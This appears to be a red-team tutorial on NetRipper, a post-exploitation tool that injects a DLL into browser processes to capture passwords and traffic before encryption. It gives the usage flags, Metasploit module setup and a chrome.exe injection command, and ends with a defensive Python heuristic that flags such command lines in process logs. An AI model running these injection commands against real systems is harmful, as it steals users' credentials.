Red Team Offense and Defense: Using DLL Injection to Capture Passwords in Memory


## 0X01 NetRipper

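NetRipper is a post-exploitation tool for Windows systems. It uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, which lets it capture both plain-text traffic and encrypted traffic before encryption / after decryption.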

## 0X02 Usage

```
Injection: NetRipper.exe DLLpath.dll processname.exe
Example:   NetRipper.exe DLL.dll firefox.exe

Generate DLL:

  -h,  --help          Print this help message
  -w,  --write         Full path for the DLL to write the configuration data
  -l,  --location      Full path where to save data files (default TEMP)

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true
  -d,  --datalimit     Limit capture size per request. E.g. 4096
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
```

Metasploit module

```
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options

Module options (post/windows/gather/netripper/netripper):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DATALIMIT     65535            no        The number of bytes to save from requests/responses
   DATAPATH      TEMP             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   DLLPATH                        no        Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
   PLAINTEXT     false            no        True to save only plain-text data
   PROCESSIDS                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                        yes       The session to run this module on.
   STRINGFINDER  DEFAULT          no        Search for specific strings in captured data
```

Set PROCESSNAMES or PROCESSIDS and run the module.

Metasploit installation (Kali)

  1. `mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper`
  2. `cp Metasploit/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb`
  3. `cp x86/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll`
  4. `cp x64/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll`

Metasploit installation (Metasploit under /opt/metasploit-framework)

  1. `mkdir /opt/metasploit-framework/modules/post/windows/gather/netripper`
  2. `cp Metasploit/netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb`
  3. `cp x86/DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll`
  4. `cp x64/DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll`

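## 0x03 Demonstration

Run the command to inject the DLL into the Chrome browser:

```
NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe
```

Then log in to any website and check the TEMP directory.

PowerShell can also be used.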

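## 0x04 Approach

On a compromised host, injecting into a process makes it possible to obtain important information; this can be combined with MSF.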
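For defenders, the two command-line shapes shown in the usage text (injection and DLL generation) can be matched in process-creation logs by argument shape, independent of the binary's file name. The following is an added example, not part of the original post or the NetRipper project; it assumes Sysmon Event ID 1 style records with `Image` and `CommandLine` fields, and the sample records and watch list are constructed.

```python
import shlex

WATCHED = {"chrome.exe", "firefox.exe", "msedge.exe"}  # msedge.exe is an assumed addition
# Plugin/location switches exactly as listed in the usage text.
GEN_FLAGS = {"-l", "--location", "-p", "--plaintext",
             "-d", "--datalimit", "-s", "--stringfinder"}

def argv_of(cmdline):
    """Split a Windows command line, keeping quoted paths as one argument."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:            # unbalanced quote: fall back to whitespace
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]

def classify(cmdline):
    """Return 'inject-watched', 'inject', 'generate' or None."""
    args = [a.lower() for a in argv_of(cmdline)[1:]]
    # Shape 1, "Injection": <path>.dll followed by a bare process name.
    if len(args) == 2 and args[0].endswith(".dll") and args[1].endswith(".exe"):
        if "\\" not in args[1] and "/" not in args[1]:   # bare name, no path
            return "inject-watched" if args[1] in WATCHED else "inject"
    # Shape 2, "Generate DLL": -w <dll> plus at least one other switch.
    for flag, value in zip(args, args[1:]):
        if flag in ("-w", "--write") and value.endswith(".dll") and GEN_FLAGS & set(args):
            return "generate"
    return None

def scan(events):
    """Return (Image, verdict) for every record that matches a shape."""
    pairs = ((ev["Image"], classify(ev["CommandLine"])) for ev in events)
    return [(img, v) for img, v in pairs if v]

# Constructed sample records (Sysmon Event ID 1 fields Image / CommandLine).
SAMPLE = [
    {"Image": r"C:\Users\demo\Downloads\NetRipper.x64.exe",
     "CommandLine": r'NetRipper.x64.exe "C:\Users\demo\Downloads\x64\DLL.x64.dll" chrome.exe'},
    {"Image": r"C:\Users\demo\AppData\Local\Temp\svc.exe",
     "CommandLine": r"svc.exe C:\Users\demo\d.dll notepad.exe"},
    {"Image": r"C:\Users\demo\Downloads\NetRipper.exe",
     "CommandLine": "NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

This is a heuristic on command-line shape only; it is meant to be correlated with other telemetry rather than used as a sole signal.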

## 0x05 Reference: project home page

https://github.com/NytroRST/NetRipper
